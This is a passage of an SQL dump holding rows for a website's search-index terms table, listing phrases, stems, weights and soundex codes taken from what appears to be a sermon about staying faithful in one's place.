(290607, 'and flourish in', 'and flourish in', 0, 1, 1.5, 'A5314625', 1, '*'),
(290608, 'and he yielded', 'and he yielded', 0, 1, 1.4667, 'A5343', 1, '*'),
(290609, 'and keep loving', 'and keep loving', 0, 1, 1.5, 'A53214152', 1, '*'),
(290610, 'and prosper', 'and prosper', 0, 1, 1.3667, 'A5316216', 1, '*'),
(290611, 'and prosper hold', 'and prosper hold', 0, 1, 1.5333, 'A531621643', 1, '*'),
(290612, 'and see glorious', 'and see glorious', 0, 1, 1.5333, 'A532462', 1, '*'),
(290613, 'and slew', 'and slew', 0, 1, 1.2667, 'A5324', 1, '*'),
(290614, 'and slew the', 'and slew the', 0, 1, 1.4, 'A53243', 1, '*'),
(290615, 'and stand their', 'and stand their', 0, 1, 1.5, 'A5323536', 1, '*'),
(290616, 'and stay there', 'and stay there', 0, 1, 1.4667, 'A53236', 1, '*'),
(290617, 'and the lordwrought', 'and the lordwrought', 0, 1, 1.6333, 'A53463623', 1, '*'),
(290618, 'and to you', 'and to you', 0, 1, 1.3333, 'A530', 1, '*'),
(290619, 'and today', 'and today', 0, 1, 1.3, 'A530', 1, '*'),
(290620, 'and today he', 'and today he', 0, 1, 1.4, 'A530', 1, '*'),
(290621, 'and women', 'and women', 0, 1, 1.3, 'A535', 1, '*'),
(290622, 'and women who', 'and women who', 0, 1, 1.4333, 'A535', 1, '*'),
(290623, 'angels because', 'angel because', 0, 1, 1.4667, 'A524212', 1, '*'),
(290624, 'angels because they', 'angel because they', 0, 1, 1.6333, 'A5242123', 1, '*'),
(290625, 'assignments or', 'assign or', 0, 1, 1.4667, 'A25326', 1, '*'),
(290626, 'assignments or even', 'assign or even', 0, 1, 1.6333, 'A2532615', 1, '*'),
(290627, 'back up', 'back up', 0, 1, 1.2333, 'B210', 1, '*'),
(290628, 'back up men', 'back up men', 0, 1, 1.3667, 'B215', 1, '*'),
(290629, 'battles of replacement', 'battl of replacement', 0, 1, 1.7333, 'B3421614253', 1, '*'),
(290630, 'be a state', 'be a state', 0, 1, 1.3333, 'B230', 1, '*'),
(290631, 'be battles', 'be battles', 0, 1, 1.3333, 'B342', 1, '*'),
(290632, 'be battles of', 'be battles of', 0, 1, 1.4333, 'B3421', 1, '*'),
(290633, 'be instructed', 'be instructed', 0, 1, 1.4333, 'B523623', 1, '*'),
(290634, 'be instructed beloved', 'be instructed beloved', 0, 1, 1.7, 'B5236231413', 1, '*'),
(290635, 'be kicked', 'be kicked', 0, 1, 1.3, 'B230', 1, '*'),
(290636, 'be kicked out', 'be kicked out', 0, 1, 1.4333, 'B230', 1, '*'),
(290637, 'because they left', 'becaus they left', 0, 1, 1.5667, 'B23413', 1, '*'),
(290638, 'beginning of vagabondary', 'begin of vagabondary', 0, 1, 1.8, 'B252121536', 1, '*'),
(290639, 'being a faithful', 'be a faithful', 0, 1, 1.5333, 'B521314', 1, '*'),
(290640, 'being faithful', 'be faithful', 0, 1, 1.4667, 'B521314', 1, '*'),
(290641, 'being faithful young', 'be faithful young', 0, 1, 1.6667, 'B52131452', 1, '*'),
(290642, 'beloved the beginning', 'belov the beginning', 0, 1, 1.7, 'B4131252', 1, '*'),
(290643, 'best place', 'best place', 0, 1, 1.3333, 'B23142', 1, '*'),
(290644, 'best place for', 'best place for', 0, 1, 1.4667, 'B2314216', 1, '*'),
(290645, 'bible said in', 'bibl said in', 0, 1, 1.4333, 'B4235', 1, '*'),
(290646, 'bird', 'bird', 0, 0, 0.2667, 'B630', 1, '*'),
(290647, 'bird that', 'bird that', 0, 1, 1.3, 'B630', 1, '*'),
(290648, 'bird that wanders', 'bird that wanders', 0, 1, 1.5667, 'B635362', 1, '*'),
(290649, 'book of 2', 'book of 2', 0, 1, 1.3, 'B210', 1, '*'),
(290650, 'book of proverbs', 'book of proverbs', 0, 1, 1.5333, 'B2161612', 1, '*'),
(290651, 'but he stood', 'but he stood', 0, 1, 1.4, 'B323', 1, '*'),
(290652, 'called \'your', 'call your', 0, 1, 1.4, 'C436', 1, '*'),
(290653, 'called \'your place\',', 'call your place', 0, 1, 1.6667, 'C436142', 1, '*'),
(290654, 'called shammar', 'call shammar', 0, 1, 1.4667, 'C43256', 1, '*'),
(290655, 'called shammar the', 'call shammar the', 0, 1, 1.6, 'C432563', 1, '*'),
(290656, 'came against israel', 'came against israel', 0, 1, 1.6333, 'C52523264', 1, '*'),
(290657, 'challenges your', 'challeng your', 0, 1, 1.5, 'C4526', 1, '*'),
(290658, 'challenges your own', 'challeng your own', 0, 1, 1.6333, 'C45265', 1, '*'),
(290659, 'christ stayed', 'christ stayed', 0, 1, 1.4333, 'C62323', 1, '*'),
(290660, 'christ stayed in', 'christ stayed in', 0, 1, 1.5333, 'C623235', 1, '*'),
(290661, 'compromise son', 'compromis son', 0, 1, 1.4667, 'C516525', 1, '*'),
(290662, 'compromise son keep', 'compromis son keep', 0, 1, 1.6333, 'C51652521', 1, '*'),
(290663, 'compromising the', 'compromis the', 0, 1, 1.5333, 'C51652523', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(290664, 'compromising the scripture', 'compromis the scripture', 0, 1, 1.8667, 'C5165252326136', 1, '*'),
(290665, 'condemned', 'condemn', 0, 0, 0.6, 'C5353', 1, '*'),
(290666, 'condemned to', 'condemn to', 0, 1, 1.4, 'C5353', 1, '*'),
(290667, 'condemned to eternal', 'condemn to eternal', 0, 1, 1.6667, 'C5353654', 1, '*'),
(290668, 'condition of mind', 'condit of mind', 0, 1, 1.5667, 'C535153', 1, '*'),
(290669, 'congratulations', 'congratul', 0, 0, 1, 'C52634352', 1, '*'),
(290670, 'contrary pastor', 'contrari pastor', 0, 1, 1.5, 'C5361236', 1, '*'),
(290671, 'contrary pastor stand', 'contrari pastor stand', 0, 1, 1.7, 'C53612362353', 1, '*'),
(290672, 'could mean', 'could mean', 0, 1, 1.3333, 'C435', 1, '*'),
(290673, 'could mean a', 'could mean a', 0, 1, 1.4, 'C435', 1, '*'),
(290674, 'david\'s', 'david', 0, 0, 0.4667, 'D132', 1, '*'),
(290675, 'david\'s mighty', 'david mighty', 0, 1, 1.4667, 'D132523', 1, '*'),
(290676, 'david\'s mighty men', 'david mighty men', 0, 1, 1.6, 'D1325235', 1, '*'),
(290677, 'defendedit', 'defendedit', 0, 0, 0.6667, 'D153', 1, '*'),
(290678, 'defendedit and', 'defendedit and', 0, 1, 1.4667, 'D15353', 1, '*'),
(290679, 'defendedit and slew', 'defendedit and slew', 0, 1, 1.6333, 'D1535324', 1, '*'),
(290680, 'demas', 'dema', 0, 0, 0.3333, 'D520', 1, '*'),
(290681, 'demas john', 'dema john', 0, 1, 1.3333, 'D525', 1, '*'),
(290682, 'demas john mark', 'dema john mark', 0, 1, 1.5, 'D52562', 1, '*'),
(290683, 'determine to', 'determin to', 0, 1, 1.4, 'D653', 1, '*'),
(290684, 'determine to stay', 'determin to stay', 0, 1, 1.5667, 'D65323', 1, '*'),
(290685, 'displacement', 'displac', 0, 0, 0.8, 'D214253', 1, '*'),
(290686, 'displacement but', 'displac but', 0, 1, 1.5333, 'D21425313', 1, '*'),
(290687, 'displacement but you', 'displac but you', 0, 1, 1.6667, 'D21425313', 1, '*'),
(290688, 'don\'t allow', 'don allow', 0, 1, 1.3667, 'D534', 1, '*'),
(290689, 'don\'t allow yourself', 'don allow yourself', 0, 1, 1.6667, 'D5346241', 1, '*'),
(290690, 'don\'t compromise', 'don compromise', 0, 1, 1.5333, 'D53251652', 1, '*'),
(290691, 'don\'t compromise son', 'don compromise son', 0, 1, 1.6667, 'D532516525', 1, '*'),
(290692, 'don\'t get carried', 'don get carried', 0, 1, 1.5667, 'D5323263', 1, '*'),
(290693, 'don\'t give up', 'don give up', 0, 1, 1.4333, 'D5321', 1, '*'),
(290694, 'don\'t leave', 'don leave', 0, 1, 1.3667, 'D5341', 1, '*'),
(290695, 'don\'t leave your', 'don leave your', 0, 1, 1.5333, 'D53416', 1, '*'),
(290696, 'don\'t let him', 'don let him', 0, 1, 1.4333, 'D53435', 1, '*'),
(290697, 'encourage you stay', 'encourag you stay', 0, 1, 1.6, 'E52623', 1, '*'),
(290698, 'enemy the', 'enemi the', 0, 1, 1.3, 'E530', 1, '*'),
(290699, 'enemy the bible', 'enemi the bible', 0, 1, 1.5, 'E5314', 1, '*'),
(290700, 'eternal punishment', 'etern punishment', 0, 1, 1.6, 'E365415253', 1, '*'),
(290701, 'eternal punishment with', 'etern punishment with', 0, 1, 1.7667, 'E365415253', 1, '*'),
(290702, 'eve all', 'ev all', 0, 1, 1.2333, 'E140', 1, '*'),
(290703, 'eve all left', 'ev all left', 0, 1, 1.4, 'E1413', 1, '*'),
(290704, 'even if the', 'even if the', 0, 1, 1.3667, 'E1513', 1, '*'),
(290705, 'even your', 'even your', 0, 1, 1.3, 'E156', 1, '*'),
(290706, 'even your posturing', 'even your posturing', 0, 1, 1.6333, 'E156123652', 1, '*'),
(290707, 'faithful son', 'faith son', 0, 1, 1.4, 'F31425', 1, '*'),
(290708, 'faithful son don\'t', 'faith son don', 0, 1, 1.6, 'F31425353', 1, '*'),
(290709, 'faithful young', 'faith young', 0, 1, 1.4667, 'F31452', 1, '*'),
(290710, 'faithful young man', 'faith young man', 0, 1, 1.6, 'F314525', 1, '*'),
(290711, 'famine', 'famin', 0, 0, 0.4, 'F500', 1, '*'),
(290712, 'famine struck', 'famin struck', 0, 1, 1.4333, 'F52362', 1, '*'),
(290713, 'famine struck and', 'famin struck and', 0, 1, 1.5667, 'F5236253', 1, '*'),
(290714, 'fathers place', 'father place', 0, 1, 1.4333, 'F362142', 1, '*'),
(290715, 'fathers place wife', 'father place wife', 0, 1, 1.6, 'F3621421', 1, '*'),
(290716, 'field', 'field', 0, 0, 0.3333, 'F430', 1, '*'),
(290717, 'field of', 'field of', 0, 1, 1.2667, 'F431', 1, '*'),
(290718, 'field of lentils', 'field of lentils', 0, 1, 1.5333, 'F43145342', 1, '*'),
(290719, 'fled but', 'fled but', 0, 1, 1.2667, 'F4313', 1, '*'),
(290720, 'fled but he', 'fled but he', 0, 1, 1.3667, 'F4313', 1, '*'),
(290721, 'flourish', 'flourish', 0, 0, 0.5333, 'F462', 1, '*'),
(290722, 'flourish in', 'flourish in', 0, 1, 1.3667, 'F4625', 1, '*'),
(290723, 'flourish in your', 'flourish in your', 0, 1, 1.5333, 'F46256', 1, '*'),
(290724, 'folds', 'fold', 0, 0, 0.3333, 'F432', 1, '*'),
(290725, 'folds be', 'fold be', 0, 1, 1.2667, 'F4321', 1, '*'),
(290726, 'folds be instructed', 'fold be instructed', 0, 1, 1.6333, 'F4321523623', 1, '*'),
(290727, 'for men', 'for men', 0, 1, 1.2333, 'F650', 1, '*'),
(290728, 'for men and', 'for men and', 0, 1, 1.3667, 'F653', 1, '*'),
(290729, 'forcefully', 'forcefulli', 0, 0, 0.6667, 'F6214', 2, '*'),
(290730, 'forcefully powerfully', 'forcefulli powerfully', 0, 1, 1.7, 'F62141614', 1, '*'),
(290731, 'forcefully powerfully without', 'forcefulli powerfully without', 0, 1, 1.9667, 'F621416143', 1, '*'),
(290732, 'forever', 'forev', 0, 0, 0.4667, 'F616', 1, '*'),
(290733, 'forever condemned', 'forev condemned', 0, 1, 1.5667, 'F61625353', 1, '*'),
(290734, 'forever condemned to', 'forev condemned to', 0, 1, 1.6667, 'F61625353', 1, '*'),
(290735, 'get carried', 'get carried', 0, 1, 1.3667, 'G3263', 1, '*'),
(290736, 'get carried away', 'get carried away', 0, 1, 1.5333, 'G3263', 1, '*'),
(290737, 'give in', 'give in', 0, 1, 1.2333, 'G150', 1, '*'),
(290738, 'give in to', 'give in to', 0, 1, 1.3333, 'G153', 1, '*'),
(290739, 'give up or', 'give up or', 0, 1, 1.3333, 'G160', 1, '*'),
(290740, 'glorious things', 'gloriou things', 0, 1, 1.5, 'G462352', 1, '*'),
(290741, 'glorious things happen', 'gloriou things happen', 0, 1, 1.7333, 'G46235215', 1, '*'),
(290742, 'god 2017 is', 'god 2017 is', 0, 1, 1.3667, 'G320', 1, '*'),
(290743, 'great victory', 'great victory', 0, 1, 1.4333, 'G631236', 1, '*'),
(290744, 'great victory heaven', 'great victory heaven', 0, 1, 1.6667, 'G63123615', 1, '*'),
(290745, 'ground and', 'ground and', 0, 1, 1.3333, 'G65353', 1, '*'),
(290746, 'ground and defendedit', 'ground and defendedit', 0, 1, 1.7, 'G65353153', 1, '*'),
(290747, 'ground don\'t', 'ground don', 0, 1, 1.4, 'G65353', 1, '*'),
(290748, 'ground don\'t compromise', 'ground don compromise', 0, 1, 1.7667, 'G65353251652', 1, '*'),
(290749, 'ground don\'t give', 'ground don give', 0, 1, 1.5667, 'G6535321', 1, '*'),
(290750, 'ground even', 'ground even', 0, 1, 1.3667, 'G65315', 1, '*'),
(290751, 'ground even if', 'ground even if', 0, 1, 1.4667, 'G653151', 1, '*'),
(290752, 'ground for', 'ground for', 0, 1, 1.3333, 'G65316', 1, '*'),
(290753, 'ground for the', 'ground for the', 0, 1, 1.4667, 'G653163', 1, '*'),
(290754, 'ground labor', 'ground labor', 0, 1, 1.4, 'G653416', 1, '*'),
(290755, 'ground labor invest', 'ground labor invest', 0, 1, 1.6333, 'G6534165123', 1, '*'),
(290756, 'ground on', 'ground on', 0, 1, 1.3, 'G6535', 1, '*'),
(290757, 'ground on a', 'ground on a', 0, 1, 1.3667, 'G6535', 1, '*'),
(290758, 'ground the', 'ground the', 0, 1, 1.3333, 'G653', 1, '*'),
(290759, 'ground the bible', 'ground the bible', 0, 1, 1.5333, 'G65314', 1, '*'),
(290760, 'grow strong', 'grow strong', 0, 1, 1.3667, 'G623652', 1, '*'),
(290761, 'grow strong and', 'grow strong and', 0, 1, 1.5, 'G62365253', 1, '*'),
(290762, 'happen for', 'happen for', 0, 1, 1.3333, 'H1516', 1, '*'),
(290763, 'happen for you', 'happen for you', 0, 1, 1.4667, 'H1516', 1, '*'),
(290764, 'hardship', 'hardship', 0, 0, 0.5333, 'H6321', 1, '*'),
(290765, 'hardship or', 'hardship or', 0, 1, 1.3667, 'H63216', 1, '*'),
(290766, 'hardship or challenges', 'hardship or challenges', 0, 1, 1.7333, 'H632162452', 1, '*'),
(290767, 'harvest in', 'harvest in', 0, 1, 1.3333, 'H61235', 1, '*'),
(290768, 'harvest in a', 'harvest in a', 0, 1, 1.4, 'H61235', 1, '*'),
(290769, 'has a name', 'ha a name', 0, 1, 1.3333, 'H250', 1, '*'),
(290770, 'has ordained you', 'ha ordained you', 0, 1, 1.5333, 'H26353', 1, '*'),
(290771, 'he has a', 'he has a', 0, 1, 1.2667, 'H200', 2, '*'),
(290772, 'he stood', 'he stood', 0, 1, 1.2667, 'H230', 1, '*'),
(290773, 'he stood his', 'he stood his', 0, 1, 1.4, 'H232', 1, '*'),
(290774, 'he stood in', 'he stood in', 0, 1, 1.3667, 'H235', 1, '*'),
(290775, 'he yielded', 'he yielded', 0, 1, 1.3333, 'H430', 1, '*'),
(290776, 'he yielded harvest', 'he yielded harvest', 0, 1, 1.6, 'H436123', 1, '*'),
(290777, 'heart a condition', 'heart a condition', 0, 1, 1.5667, 'H632535', 1, '*'),
(290778, 'heaven is ready', 'heaven is ready', 0, 1, 1.5, 'H15263', 1, '*'),
(290779, 'held his', 'held his', 0, 1, 1.2667, 'H432', 1, '*'),
(290780, 'held his ground', 'held his ground', 0, 1, 1.5, 'H432653', 1, '*'),
(290781, 'her place', 'her place', 0, 1, 1.3, 'H6142', 1, '*'),
(290782, 'her place demas', 'her place demas', 0, 1, 1.5, 'H6142352', 1, '*'),
(290783, 'him lure', 'him lure', 0, 1, 1.2667, 'H546', 1, '*'),
(290784, 'him lure you', 'him lure you', 0, 1, 1.4, 'H546', 1, '*'),
(290785, 'him stay', 'him stay', 0, 1, 1.2667, 'H523', 1, '*'),
(290786, 'him stay in', 'him stay in', 0, 1, 1.3667, 'H5235', 1, '*'),
(290787, 'his angels', 'hi angels', 0, 1, 1.3333, 'H25242', 1, '*'),
(290788, 'his angels because', 'hi angels because', 0, 1, 1.6, 'H2524212', 1, '*'),
(290789, 'his ground', 'hi ground', 0, 1, 1.3333, 'H2653', 1, '*'),
(290790, 'his ground on', 'hi ground on', 0, 1, 1.4333, 'H26535', 1, '*'),
(290791, 'his ground the', 'hi ground the', 0, 1, 1.4667, 'H2653', 1, '*'),
(290792, 'his place', 'hi place', 0, 1, 1.3, 'H2142', 1, '*'),
(290793, 'his place and', 'hi place and', 0, 1, 1.4333, 'H214253', 1, '*'),
(290794, 'his place don\'t', 'hi place don', 0, 1, 1.5, 'H2142353', 1, '*'),
(290795, 'his place king', 'hi place king', 0, 1, 1.4667, 'H214252', 1, '*'),
(290796, 'his place there', 'hi place there', 0, 1, 1.5, 'H214236', 1, '*'),
(290797, 'his place vashti', 'hi place vashti', 0, 1, 1.5333, 'H2142123', 1, '*'),
(290798, 'hold your', 'hold your', 0, 1, 1.3, 'H436', 1, '*'),
(290799, 'hold your ground', 'hold your ground', 0, 1, 1.5333, 'H4362653', 1, '*'),
(290800, 'however as', 'howev as', 0, 1, 1.3333, 'H162', 1, '*'),
(290801, 'however as we', 'howev as we', 0, 1, 1.4333, 'H162', 1, '*'),
(290802, 'hundred folds', 'hundr folds', 0, 1, 1.4333, 'H53631432', 1, '*'),
(290803, 'hundred folds be', 'hundr folds be', 0, 1, 1.5333, 'H536314321', 1, '*'),
(290804, 'if the popular', 'if the popular', 0, 1, 1.4667, 'I13146', 1, '*'),
(290805, 'in a hundred', 'in a hundred', 0, 1, 1.4, 'I5363', 1, '*'),
(290806, 'in god 2017', 'in god 2017', 0, 1, 1.3667, 'I523', 1, '*'),
(290807, 'in his place', 'in his place', 0, 1, 1.4, 'I52142', 1, '*'),
(290808, 'in ministry', 'in ministry', 0, 1, 1.3667, 'I5236', 1, '*'),
(290809, 'in ministry your', 'in ministry your', 0, 1, 1.5333, 'I5236', 1, '*'),
(290810, 'in the book', 'in the book', 0, 1, 1.3667, 'I5312', 2, '*'),
(290811, 'in their place', 'in their place', 0, 1, 1.4667, 'I536142', 1, '*'),
(290812, 'in to the', 'in to the', 0, 1, 1.3, 'I530', 1, '*'),
(290813, 'in verse', 'in verse', 0, 1, 1.2667, 'I5162', 1, '*'),
(290814, 'in verse 12', 'in verse 12', 0, 1, 1.3667, 'I5162', 1, '*'),
(290815, 'in your place', 'in your place', 0, 1, 1.4333, 'I56142', 1, '*'),
(290816, 'instructed beloved', 'instruct beloved', 0, 1, 1.6, 'I5236231413', 1, '*'),
(290817, 'instructed beloved the', 'instruct beloved the', 0, 1, 1.7333, 'I5236231413', 1, '*'),
(290818, 'into the new', 'into the new', 0, 1, 1.4, 'I535', 1, '*'),
(290819, 'invest', 'invest', 0, 0, 0.4, 'I5123', 1, '*'),
(290820, 'invest work', 'invest work', 0, 1, 1.3667, 'I512362', 1, '*'),
(290821, 'invest work sow', 'invest work sow', 0, 1, 1.5, 'I512362', 1, '*'),
(290822, 'is a man', 'is a man', 0, 1, 1.2667, 'I250', 1, '*'),
(290823, 'is a place', 'is a place', 0, 1, 1.3333, 'I2142', 1, '*'),
(290824, 'is a year', 'is a year', 0, 1, 1.3, 'I260', 1, '*'),
(290825, 'is contrary', 'is contrary', 0, 1, 1.3667, 'I2536', 1, '*'),
(290826, 'is contrary pastor', 'is contrary pastor', 0, 1, 1.6, 'I25361236', 1, '*'),
(290827, 'is forever', 'is forever', 0, 1, 1.3333, 'I21616', 1, '*'),
(290828, 'is forever condemned', 'is forever condemned', 0, 1, 1.6667, 'I2161625353', 1, '*'),
(290829, 'is leaving', 'is leaving', 0, 1, 1.3333, 'I24152', 1, '*'),
(290830, 'is leaving your', 'is leaving your', 0, 1, 1.5, 'I241526', 1, '*'),
(290831, 'is the best', 'is the best', 0, 1, 1.3667, 'I23123', 1, '*'),
(290832, 'isaac sowed', 'isaac sowed', 0, 1, 1.3667, 'I230', 1, '*'),
(290833, 'isaac sowed in', 'isaac sowed in', 0, 1, 1.4667, 'I235', 1, '*'),
(290834, 'israel others', 'israel others', 0, 1, 1.4333, 'I264362', 1, '*'),
(290835, 'israel others fled', 'israel others fled', 0, 1, 1.6, 'I264362143', 1, '*'),
(290836, 'it congratulations', 'it congratulations', 0, 1, 1.6, 'I3252634352', 1, '*'),
(290837, 'it\'s nest', 'it nest', 0, 1, 1.3, 'I32523', 1, '*'),
(290838, 'it\'s nest so', 'it nest so', 0, 1, 1.4, 'I325232', 1, '*'),
(290839, 'item 11', 'item 11', 0, 1, 1.2333, 'I350', 1, '*'),
(290840, 'item 11 you', 'item 11 you', 0, 1, 1.3667, 'I350', 1, '*'),
(290841, 'jesus christ stayed', 'jesu christ stayed', 0, 1, 1.6333, 'J62323', 1, '*'),
(290842, 'john mark', 'john mark', 0, 1, 1.3, 'J562', 1, '*'),
(290843, 'john mark judas', 'john mark judas', 0, 1, 1.5, 'J56232', 1, '*'),
(290844, 'jonathan', 'jonathan', 0, 0, 0.5333, 'J535', 1, '*'),
(290845, 'jonathan adam', 'jonathan adam', 0, 1, 1.4333, 'J53535', 1, '*'),
(290846, 'jonathan adam and', 'jonathan adam and', 0, 1, 1.5667, 'J535353', 1, '*'),
(290847, 'judas', 'juda', 0, 0, 0.3333, 'J320', 1, '*'),
(290848, 'judas the', 'juda the', 0, 1, 1.3, 'J323', 1, '*'),
(290849, 'judas the prodigal', 'juda the prodigal', 0, 1, 1.6, 'J32316324', 1, '*'),
(290850, 'k2 item 11', 'k2 item 11', 0, 1, 1.3333, 'K350', 1, '*'),
(290851, 'keep being a', 'keep being a', 0, 1, 1.4, 'K152', 1, '*'),
(290852, 'keep being faithful', 'keep being faithful', 0, 1, 1.6333, 'K1521314', 1, '*'),
(290853, 'keep loving', 'keep loving', 0, 1, 1.3667, 'K14152', 1, '*'),
(290854, 'keep loving him', 'keep loving him', 0, 1, 1.5, 'K141525', 1, '*'),
(290855, 'kicked', 'kick', 0, 0, 0.4, 'K300', 1, '*'),
(290856, 'kicked out', 'kick out', 0, 1, 1.3333, 'K300', 1, '*'),
(290857, 'kicked out of', 'kick out of', 0, 1, 1.4333, 'K310', 1, '*'),
(290858, 'king saul', 'king saul', 0, 1, 1.3, 'K524', 1, '*'),
(290859, 'king saul left', 'king saul left', 0, 1, 1.4667, 'K52413', 1, '*'),
(290860, 'labor invest', 'labor invest', 0, 1, 1.4, 'L165123', 1, '*'),
(290861, 'labor invest work', 'labor invest work', 0, 1, 1.5667, 'L16512362', 1, '*'),
(290862, 'lady', 'ladi', 0, 0, 0.2667, 'L300', 2, '*'),
(290863, 'lady stand', 'ladi stand', 0, 1, 1.3333, 'L32353', 1, '*'),
(290864, 'lady stand your', 'ladi stand your', 0, 1, 1.5, 'L323536', 1, '*'),
(290865, 'land where', 'land where', 0, 1, 1.3333, 'L536', 2, '*'),
(290866, 'land where famine', 'land where famine', 0, 1, 1.5667, 'L53615', 1, '*'),
(290867, 'leave your', 'leav your', 0, 1, 1.3333, 'L160', 1, '*'),
(290868, 'leave your place', 'leav your place', 0, 1, 1.5333, 'L16142', 1, '*'),
(290869, 'leaving your place', 'leav your place', 0, 1, 1.6, 'L1526142', 1, '*'),
(290870, 'left her', 'left her', 0, 1, 1.2667, 'L136', 1, '*'),
(290871, 'left her place', 'left her place', 0, 1, 1.4667, 'L136142', 1, '*'),
(290872, 'left his', 'left his', 0, 1, 1.2667, 'L132', 1, '*'),
(290873, 'left his place', 'left his place', 0, 1, 1.4667, 'L132142', 1, '*'),
(290874, 'left their', 'left their', 0, 1, 1.3333, 'L136', 1, '*'),
(290875, 'left their places', 'left their places', 0, 1, 1.5667, 'L136142', 1, '*'),
(290876, 'lentils', 'lentil', 0, 0, 0.4667, 'L5342', 1, '*'),
(290877, 'lentils when', 'lentil when', 0, 1, 1.4, 'L53425', 1, '*'),
(290878, 'lentils when the', 'lentil when the', 0, 1, 1.5333, 'L534253', 1, '*'),
(290879, 'let him lure', 'let him lure', 0, 1, 1.4, 'L3546', 1, '*'),
(290880, 'like a bird', 'like a bird', 0, 1, 1.3667, 'L2163', 1, '*'),
(290881, 'location it', 'locat it', 0, 1, 1.3667, 'L2353', 1, '*'),
(290882, 'location it could', 'locat it could', 0, 1, 1.5667, 'L2353243', 1, '*'),
(290883, 'lord and keep', 'lord and keep', 0, 1, 1.4333, 'L635321', 1, '*'),
(290884, 'lordwrought', 'lordwrought', 0, 0, 0.7333, 'L63623', 1, '*'),
(290885, 'lordwrought a', 'lordwrought a', 0, 1, 1.4333, 'L63623', 1, '*'),
(290886, 'lordwrought a great', 'lordwrought a great', 0, 1, 1.6333, 'L63623263', 1, '*'),
(290887, 'loving', 'love', 0, 0, 0.4, 'L152', 1, '*'),
(290888, 'loving him', 'love him', 0, 1, 1.3333, 'L1525', 1, '*'),
(290889, 'loving him stay', 'love him stay', 0, 1, 1.5, 'L152523', 1, '*'),
(290890, 'lucifer', 'lucif', 0, 0, 0.4667, 'L216', 1, '*'),
(290891, 'lucifer is', 'lucif is', 0, 1, 1.3333, 'L2162', 1, '*'),
(290892, 'lucifer is forever', 'lucif is forever', 0, 1, 1.6, 'L21621616', 1, '*'),
(290893, 'lucifer left', 'lucif left', 0, 1, 1.4, 'L216413', 1, '*'),
(290894, 'lucifer left his', 'lucif left his', 0, 1, 1.5333, 'L2164132', 1, '*'),
(290895, 'lure', 'lure', 0, 0, 0.2667, 'L600', 1, '*'),
(290896, 'lure you', 'lure you', 0, 1, 1.2667, 'L600', 1, '*'),
(290897, 'lure you out', 'lure you out', 0, 1, 1.4, 'L630', 1, '*'),
(290898, 'made it', 'made it', 0, 1, 1.2333, 'M300', 1, '*'),
(290899, 'made it congratulations', 'made it congratulations', 0, 1, 1.7667, 'M3252634352', 1, '*'),
(290900, 'man who wanders', 'man who wanders', 0, 1, 1.5, 'M362', 1, '*'),
(290901, 'man young', 'man young', 0, 1, 1.3, 'M200', 1, '*'),
(290902, 'man young lady', 'man young lady', 0, 1, 1.4667, 'M243', 1, '*'),
(290903, 'mark judas', 'mark judas', 0, 1, 1.3333, 'M6232', 1, '*'),
(290904, 'mark judas the', 'mark judas the', 0, 1, 1.4667, 'M62323', 1, '*'),
(290905, 'matter the hardship', 'matter the hardship', 0, 1, 1.6333, 'M3636321', 1, '*'),
(290906, 'mean a', 'mean a', 0, 1, 1.2, 'M000', 1, '*'),
(290907, 'mean a location', 'mean a location', 0, 1, 1.5, 'M4235', 1, '*'),
(290908, 'means to you', 'mean to you', 0, 1, 1.4, 'M230', 1, '*'),
(290909, 'men and', 'men and', 0, 1, 1.2333, 'M300', 1, '*'),
(290910, 'men and women', 'men and women', 0, 1, 1.4333, 'M350', 1, '*'),
(290911, 'men called', 'men called', 0, 1, 1.3333, 'M243', 1, '*'),
(290912, 'men called shammar', 'men called shammar', 0, 1, 1.6, 'M243256', 1, '*'),
(290913, 'midst of the', 'midst of the', 0, 1, 1.4, 'M32313', 1, '*'),
(290914, 'mighty men', 'mighti men', 0, 1, 1.3333, 'M235', 1, '*'),
(290915, 'mighty men called', 'mighti men called', 0, 1, 1.5667, 'M235243', 1, '*'),
(290916, 'mind a', 'mind a', 0, 1, 1.2, 'M300', 1, '*'),
(290917, 'mind a position', 'mind a position', 0, 1, 1.5, 'M31235', 1, '*'),
(290918, 'ministry your', 'ministri your', 0, 1, 1.4333, 'M236', 1, '*'),
(290919, 'ministry your assignments', 'ministri your assignments', 0, 1, 1.8333, 'M2362532', 1, '*'),
(290920, 'move into the', 'move into the', 0, 1, 1.4333, 'M153', 1, '*'),
(290921, 'must stay', 'must stay', 0, 1, 1.3, 'M2323', 1, '*'),
(290922, 'must stay in', 'must stay in', 0, 1, 1.4, 'M23235', 1, '*'),
(290923, 'name above', 'name above', 0, 1, 1.3333, 'N100', 1, '*'),
(290924, 'name above all', 'name above all', 0, 1, 1.4667, 'N140', 1, '*'),
(290925, 'names lucifer', 'name lucifer', 0, 1, 1.4333, 'N24216', 1, '*'),
(290926, 'names lucifer is', 'name lucifer is', 0, 1, 1.5333, 'N242162', 1, '*'),
(290927, 'nest', 'nest', 0, 0, 0.2667, 'N230', 1, '*'),
(290928, 'nest so', 'nest so', 0, 1, 1.2333, 'N232', 1, '*'),
(290929, 'nest so is', 'nest so is', 0, 1, 1.3333, 'N232', 1, '*'),
(290930, 'new year i', 'new year i', 0, 1, 1.3333, 'N600', 1, '*'),
(290931, 'next year', 'next year', 0, 1, 1.3, 'N236', 1, '*'),
(290932, 'next year go', 'next year go', 0, 1, 1.4, 'N2362', 1, '*'),
(290933, 'of 2', 'of 2', 0, 1, 1.1333, 'O100', 1, '*'),
(290934, 'of 2 samuel', 'of 2 samuel', 0, 1, 1.3667, 'O1254', 1, '*'),
(290935, 'of agee', 'of agee', 0, 1, 1.2333, 'O120', 1, '*'),
(290936, 'of agee in', 'of agee in', 0, 1, 1.3333, 'O125', 1, '*'),
(290937, 'of david\'s', 'of david', 0, 1, 1.3333, 'O13132', 1, '*'),
(290938, 'of david\'s mighty', 'of david mighty', 0, 1, 1.5667, 'O13132523', 1, '*'),
(290939, 'of heart a', 'of heart a', 0, 1, 1.3333, 'O163', 1, '*'),
(290940, 'of his place', 'of his place', 0, 1, 1.4, 'O12142', 1, '*'),
(290941, 'of it\'s', 'of it', 0, 1, 1.2333, 'O132', 1, '*'),
(290942, 'of it\'s nest', 'of it nest', 0, 1, 1.4, 'O132523', 1, '*'),
(290943, 'of lentils', 'of lentils', 0, 1, 1.3333, 'O145342', 1, '*'),
(290944, 'of lentils when', 'of lentils when', 0, 1, 1.5, 'O1453425', 1, '*'),
(290945, 'of mind', 'of mind', 0, 1, 1.2333, 'O153', 1, '*'),
